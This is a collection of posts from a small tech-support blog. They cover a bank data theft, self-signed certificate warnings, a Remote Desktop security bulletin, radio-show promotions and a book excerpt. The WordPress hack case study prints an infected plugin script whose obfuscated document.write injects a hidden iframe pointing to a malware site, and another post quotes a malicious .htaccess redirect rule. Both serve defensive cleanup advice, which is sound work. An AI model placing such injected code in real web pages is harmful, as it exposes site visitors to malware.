Sorry I’ve not been around much posting and such. Dealing with some family “issues” and should have everything back to normal shortly!

That being said, I wanted to briefly comment on the article I read this morning about the HSBC Swiss Data breach.

According to the article:

A former IT employee of Swiss subsidiary HSBC Private Bank (Suisse) SA, identified by French authorities as Herve Falciani, stole the information between late 2006 and early 2007, the bank said.

My concern with this is that the breach took place in late 2006 and early 2007 and we’re just hearing about it now????

We should all be questioning what other data breaches – at other banks or companies – have taken place that affect us and our private data but we haven’t heard about????

To me, that is more frightening than the breach itself!

via HSBC: data on 24,000 Swiss account holders stolen – Yahoo! News.

I have had two separate support questions raised because of the Invalid Server Certificate Warning in both Internet Explorer (IE) and Firefox (FF) this week, so I thought I’d post a brief explanation about this issue.

From time-to-time, you may receive one of the following Server Certificate warnings or error message, as some call it.

(Click to view larger image)

The above graphic is what you will see if you are using Internet Explorer.

(Click to view larger image)

The above graphic is what you will see if you are using Firefox.

(Click to view larger image)

The above graphic is what you will see if you are using Google Chrome.

I have blurred out the clients website I was visiting to get this image.

(Click to view larger image)

The above graphic is what you will see if you are using Apple Safari.

I have blurred out the clients website I was visiting to get this image.

Why does this happen?

It happens because the security certificate – the code that makes the HTTP an HTTPS (or secure connection) has been self-signed and has not been issued by a certification authority such as Thawte, Verisign, and so forth.

Where does it happen?

It should only happen when you are logging into your own secure e-mail client on your web hosting site, or when you try to access your control panel on your web hosts site.

When should I NOT see this?

You should NEVER see this when you are logging into:

• Any financial site, as in your bank, trading accounts, insurance, credit card institution or other such sites.
• Any online shopping site.
• Any site where you are required to exchange confidential information such as banks, credit bureaus, stock brokerage, and so on.

Why does my web host do this?

Certificates from a certifying authority is costly especially for hosting companies. Many hosts self sign certificates to allow secure access for their customers who want security when accessing their online email or control panel for their hosting accounts.

If I log in to my e-mail or control panel anyway, am I still secure?

You are secure to the level of security that your web host offers. You need to check with them as to the level of encryption they provide.

Keep in mind that the certificate does not guarantee encryption.  If the certificate was provided by a third party provider, it only guarantees that the site and the site owner has been verified that they are, who they say they are!

Why is this such an issue?

It’s an issue because of the scammers and phishers that have become rampant on the Internet. The browser providers like Google Chrome, IE, FF, and Safari – to name a few – have included this warning to help you spot a phishing or scammer site more easily.

Can I ignore this warning?

Yes, if you know with CERTAINTY that this is the site you want to go to.

If you have clicked on a link in an email, a Twitter DM, or any other web page link and you see this message, do not proceed! Chances are good it’s a phishing or scam site.

If you have typed in the URL to your webmail or control panel account on your web host, or clicked the link from within your web hosts setup information, then you can proceed safely. In the images that follow, you will see that there is also a button in the Firefox message that will allow you to see the actual self-signed certificate to make sure you are at your web hosts server.

How can I stop this error message?

If you are getting this error message when you try to login to your web host control panel or web mail on your web host, you can add a permanent exception by accepting the self-signed certificate.

In most browsers, you can click on a button to see the actual self-signed certificate and verify it’s your web host. The following is an example of a self-signed certificate on a LunarPages server.

(Click to view larger image)

In Firefox, it’s a slightly different behavior.  You have to click the arrow next to the second line item to get to view the certificate or accept it.

(Click to view larger image)

(Click to view larger image)

Remember, this is normal behavior if you are signing in to your web host email or control panel and neither you, nor your web host have purchased a certificate from an issuing authority.

It is NOT normal behavior for any sites that you would do business with like shops, financial and investment institutions, and other such businesses.

I hope this helps clear up the matter of Server Certificate warnings.

Those of you who are my PC security (Introduction to PC Security) students don’t have to worry about this because in the first few lessons of the course you’ve disabled this!

However, many of you have not taken the course so I thought it was wise to post this.

Oh, and by the MAC users, this affects you too if you are using the Microsoft Remote Desktop Connection Client to connect a MAC to a windows PC.

According to Microsoft’s Security Bulletin: MS09-044:

This security update resolves two privately reported vulnerabilities in Microsoft Remote Desktop Connection. The vulnerabilities could allow remote code execution if an attacker successfully convinced a user of Terminal Services to connect to a malicious RDP server or if a user visits a specially crafted Web site that exploits this vulnerability. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

via Microsoft Security Bulletin MS09-044 – Critical: Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution 970927.

There is also known issues after installing this update, so you may want to check the bulletin for a list of those.

I’ve been teaching the Introduction to PC Security course for over 5 years and from day 1 I’ve had the students disable this service! I wonder what else you’re missing?

Rob Caskey, VP of Marketing for Liquidation.com

Get advice from a true expert, when Rob Caskey, VP of Marketing for Liquidation.com, appears live on Technical Tidbits. Learn the secrets of successful retail sales and find out how Liquidation reached the top of the game as a re-seller of major retailers’ overstock, surplus and seasonal unsold merchandise

The holidays are long gone, but do you ever wonder what happens to the seasonal merchandise that doesn’t sell?  Rob Caskey, VP of Marketing for Liquidation.com, knows.

Liquidation.com is the largest re-seller of overstock, customer returns, seasonal and other unsold merchandise. You can buy at tremendous deals from the online auction house and re-sell anywhere.

Would you like to make a few extra dollars with a flea market booth? Are you an eBay seller? Have you thought about opening a dollar store? Whether you’d like to earn extra cash selling online, or find a new career working for yourself as a retail business owner, Caskey will share the secrets to re-selling success.

Rob Caskey is VP of Marketing for Liquidation.com (a division of Liquidity Services, Inc. NASDAQ: LQDT) which is where major retailers go to sell their surplus, overstock, customer returns, seasonal and overall unsold merchandise and the online auction becomes a sourcing center for resellers from eBay to independent boutiques to dollar store merchants to anyone and everyone trying to make extra money at flea markets, yard sales, and other online/offline venues.

Wednesday, February 24, 2010 10 AM CDT
Call In Number: (718) 506-1315
Or Listen LIVE Online: Technical Tidbits on BlogTalk Radio

LIVE CHAT WILL BE OPEN AS ALWAYS!

Please note: If the show page shows the time in EST (New York) time and you are on Central Time (CDT), you have to delete your cookies. BlogTalk Radio says this is an “old” cookie problem. The show is at 10 AM in Illinois or Central Daylight Time!

This is a reprint of a recent article under our Business Bits section of the Technical Tidbits™ Newsletter. I was asked by a subscriber to put it online so it can be accessed by non-subscribers.

If you like the article, I recommend that you fill in your e-mail address on the upper right and click the subscribe button to subscribe to our newsletters.

I was agonizing over what to write about in this portion of the newsletter when a conference call this morning provided me with the content!

This particular call involved me, a staff member that we call our resident marketing guru, and a gentleman he had connected with that needed some help. As it was explained to me, the man needed my help because he had all this content and was not selling a thing.

The first warning signal I received about this man’s issue was that he had published two books on his area of expertise and refused to sell them on Amazon because they require a commission. I asked if he had sold any on his own, to which he replied, “a few.”

Before I could hit him with the fact that Amazon would be much better at reaching an audience then he could ever hope to reach, he said something that made everything quite clear. He said that much of his accompanying material was not perfected yet and therefore he couldn’t proceed with his sales of the books or his courses until it had been “perfected.”

Now, to back step a moment here, my degree is in Applied Behavioral Science and I/O Psychology (Industrial/Organizational). I took that educational path because it is what corporate trainers do, which was what I wanted to do in my career – train people in technology. Much of what I learned was not only about how people learn, but barriers to learning. Often times, these barriers can be emotional or psycho-social within the person themselves.

For example, I was once hired by Motorola Corporation to personally tutor 1-on-1 an executive assistant in the fine art of using PowerPoint. Within two visits to this young ladies desk, I told Motorola that she was un-trainable. There was nothing wrong with her mind; she was a very bright young woman. What was wrong was she was unwilling to learn. She had a mindset that PowerPoint presentations were beneath her and therefore had no intention of ever learning it. Administrative assistants did PowerPoint presentations – not executive assistants!

That being said, I recognized a pattern in this gentleman on the conference call. So I probed further. The man has literally hundreds of training courses and material available but has not sold a single item. His insistence on the fact that none of the developed materials had been “perfected” and the constant reaffirmation that his content was so unique that it couldn’t be sold the way I was suggesting (online) led me straight to his problem.

So, I asked him if he knew of some very powerful people in his field and I named the names of 5 people I knew carried a lot of weight in his area of expertise. He agreed that he indeed knows of them and that they were fine examples of the field. I then went on to inform him that these 5 people were selling EXACTLY the way I was telling him to sell his material. These people were involved in online marketing, had a website, engaged in social media, and so on.

He reiterated that he could not sell online.

I know many of you reading this are shaking your head because you know how well online marketing and sales works and you know that your business probably lives and dies by it!

But the point I want to make is that this man was not blind to the opportunities technology is offering him, he’s suffering from Perfection Paralysis.

One of the comments he made during the conversation was that he was spending much of his time packaging and shipping his content. (To who, I don’t know because he still said he wasn’t selling anything!) So, I diffused this objection and told him to go check out CafePress.com. They have an excellent print-on-demand program that could free up his time.

But again, objection after objection when our marketing guru pressed him to take one step forward into the online arena, was always the fact that it needed “perfecting.”

I don’t know about you, but I know I’m guilty of that same paralysis in my own business. The newsletter has to be just perfect or I can’t send it. The course has to be just perfect or I can’t post it and sell it. And so on…..

When you get caught in the trap of Perfection Paralysis in your business, there is a tip you can take away from Bill Gates and Microsoft. If Bill Gates and Microsoft waited for the operating systems and products they produce to be perfect, do you think you’d be reading this on a Windows operating system?  Do you think Microsoft would have become such a large corporation?

Now don’t get me wrong! I’m not telling you to plan your business model around Microsoft and issue products that require patch after patch and only works some of the time. That’s not my point.

My point is that sometimes it just has to be GEFN – Good Enough For Now.

And with that closing comment, I’m going to take my own advice and get this newsletter sent!

In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.

First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.

I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.

During my investigation, another interesting development that I was just told about, and that is another user of the web hosting service was also hacked in a similar method.

So now, I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites but, that leads us to the issue of the web hosting company making sure they are protecting their users!

I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users.  So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)

That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!

I poured over the SQL database dump for over 48 hours (not consecutively) and compared WP files like the WP_config.php and such and could not find anything except a strange base64-65 code that I could not isolate.

I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.

I looked at individual plug-in file JPG files and upload JPG files to see if they were actually pictures or a spoofed file name containing actual code. Still nothing.

After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!

Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.

The code resided in a plug-in called, I Love Social Bookmarking and the file affected resided in:  wp-content/plugins/i-love-social-bookmarking/includes/

The actual file was named: ilsb.js

The normal ilsb.js file should read:

// JavaScript Document
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The hacked code within Sam’s file read:

// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The offending code is the one that writes the document and includes all the percent signs (%).

This code inserted an iframe in the top of the page which redirected to a malware site.

Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!

I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.

But here is your take-away from this experience: secure you WP blog!

1. Remove the Admin account by logging in and setting up a new administrator account with a totally different name.  Assign it the administrator priviladges.
2. Log out and log back in under the new name.
3. Delete the admin account and WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
4. Install the Bad Behavior Plug-in and configure it properly.

If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!

5. Make sure you config and get the API key for Akismet.
6. Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet and suffice it to say that I believe spam comments with links may be key in this method.
7. Make sure that all users – if you allow them to register – are configured to be subscribers only!
8. If you suspect foul play of any sort, search for a hidden user. To do that:

• Click on your Users section.
• Click on the link to the Administrators page.
• Right click on the page and choose: View Source.
• Look for the following code on that source page:  tbody id="users".  It should be toward the bottom. If you have 1 registered administrator, there should only be one name in that list. If you have 2, then there should only be two names, and so on.
• If you find one, you will have to delete this person out of your SQL database.

I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!

TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here:  https://www.kb.cert.org/vuls/id/773545

And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357

*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!

Talk to me LIVE this Wednesday, February 10th at 10 AM CDT on my BlogTalk Radio show!

The Official Blurb:

Everyone’s got questions! – Ask your question on this special episode of Technical Tidbits with Debbie Mahler. One full hour of taking your questions either on the phone or in the live chat! You’ll have access to your own technical guru for a full hour FREE!  And as she tells her students: The only stupid question is the one left unasked! Get your questions answered!

Everyone from advanced techies to Grandma — who just wants to download photos of her grandbabies from Facebook — will hear something of value on this special edition of Technical Tidbits with Debbie Mahler.

It’s all about YOUR Frequently Asked Questions. And that means questions from you, our loyal and beloved listeners. So phone in or chat live! Here’s your chance to have all your burning technology questions answered by the expert.

Join me LIVE!

Call In Phone Number: (718) 506-1315

Or go to the show page:  Technical Tidbits on BlogTalk Radio, and scroll down to see the live chat box!

Our BlogTalk Radio show guests Chris Oleson, Mike Hagan, and Christophe DeMoss has given me permission to reprint this excerpt from their book: Achieving IT Service Quality – The Opposite of Luck.

Perhaps after reading this brief section that I found so “right on” in my own IT work with clients, you might see why I’ve been talking up this book! You can download a chapter and connect with Chris, Mike, and Christophe at their blog: ooluck.com

The Temptation of Band-Aids

The memory leak example is a good one to continue with to discuss something very important: avoiding long-term use of Band-Aids.  In order to survive, organizations that are unable, unwilling, or just don’t know how to get to true root cause will inevitably resort to Band-Aids as a way of getting by.

We were once brought in to help a particularly troubled sales application where a memory leak bug caused a server to run out of memory in the middle of a particularly critical production day. When we pushed for root cause, we were told the cause of the failure had been human error. This seemed quite possible to us. We began to wonder where the human error had been made. Was it during the testing process that allowed the bug to make it into production? Was the human error during the coding process that created the bug in the first place? We were eager to hear where the human error had occurred so the root cause could be addressed.

Imagine our surprise when we were told the root cause was an administrator having inadvertently disabled a cron¹¹ job to automatically reboot the server every night to clear the memory that was being consumed by the memory leak. You see, the memory leak was a known problem for more than a year, and somewhere along the line someone had decided that doing an automated nightly bounce of the server was the right permanent solution. In the mind of the manager performing the root cause investigation, the problem had been solved by the nightly auto-restart, and the mistake occurred when the administrator inadvertently turned off the job that kicked off the reboot. Clearly, we had different ideas than the manager about what root cause actually means. He had stopped several whys short instead of looking deeper.

In this particular case, a Band-Aid had been mistaken for the root cause corrective action. Instead of fixing the code bug causing the memory leak (and fixing the process that allowed the code bug to make it into production), the decision was consciously made to just apply the Band-Aid. This prevented reoccurrence, but also masked the root problem. To be sure, writing a bounce script is a lot easier than diagnosing and fixing a memory bug, and is a valid intermediate step to take in case the leak takes a few weeks to fix, test, and deploy, but the easy way out continues to put you at risk over the long term. The root problem continued to lurk in the environment until, just like The Ostrich Postulate says it will, it reoccurred at an even more inopportune time. Had the root problem been fixed when first identified a year earlier, the repeat outage could have been prevented.

And on top of all of that, it turns out that increases in processing volumes had caused memory use on the server to grow, so the leak effectively became larger. Since running out of memory on the server causes an incident, the nightly bounce would have only worked for a few more weeks before it would not have had enough, memory would be consumed by midday, and daily outages would have begun to occur. This is a classic example of The Ostrich Postulate in action.

[End of Excerpt]

I’m sure you can see how down to earth and plainly written this book is. This is why I highly recommend it to anyone involved in IT or who has to deal with performance issues in the workplace at all. Whether you work for a big enterprise or are a small IT company, the practical advice in this book is invaluable! Even those involved with building reports and metrics for the IT division will find this invaluable!

I have no reason – no monetary compensation other than perhaps an Amazon affiliate payment if you buy through my site – to promote this book. It was given to me free prior to the guests being on my show, but I’m telling you, I CANNOT put it down!

I am sharing this with you because I think YOU – my readers – can benefit from this book. This is a MUST READ!  It has been an enormous help to me already in my work!

¹¹ Cron: A feature in UNIX systems (which stands for “command run on”) that allows commands or scripts to run automatically at a scheduled time.

See larger image Achieving IT Service Quality: The Opposite of Luck (Paperback) By (author) Chris Oleson, Mike Hagan, Christophe DeMoss List Price: $32.95 USD New From: $21.74 In Stock Used from: $13.89 In Stock

Here at MICE, we don’t publicly advertise our security clients because it’s an open invitation to hackers.

However, I do need to tell you that I was recently hired to look over a self-hosted WordPress blog site that had been hacked.  I didn’t get to see the actual hacked message, but the client described it as a defacement of the main blog page saying, “You’ve been hacked.”

I am still trying to find out from the blog owner a few minor details to determine how it was actually done, but the .htaccess file had been modified giving the hacker permission to rewrite to all the files on the blog.

As soon as I find out the remaining information, I will post more details including screen shots of the website that the file redirected to.

I am blocking the actual redirect website with Xs in the line I found in question in the .htaccess file because I don’t want anyone going there, but if you see this code, delete it and re-upload the file.

RewriteRule .* http://xxx-xxxxx.xx/xx.cgi?4&parameter=ku [R,L]

The R stands for Redirect and the L means Last so it stops processing the rule after the condition is matched.

You can open the .htaccess file in a textpad or notepad document if you right mouse click and choose open with.

More later but this your heads up!

Rob Caskey, VP of Marketing for Liquidation.com

Need a product to sell? Looking to start an online shop? Want to jump into the Internet marketing game? Then you do not want to miss our BlogTalk Radio show with VP of Marketing for Liquidation.com, Rob Caskey!

Listen live, ask questions in our live, online chat room, or call in and talk to us! Technical Tidbits on BlogTalk Radio

Wednesday, January 6, 2010, 10 AM CDT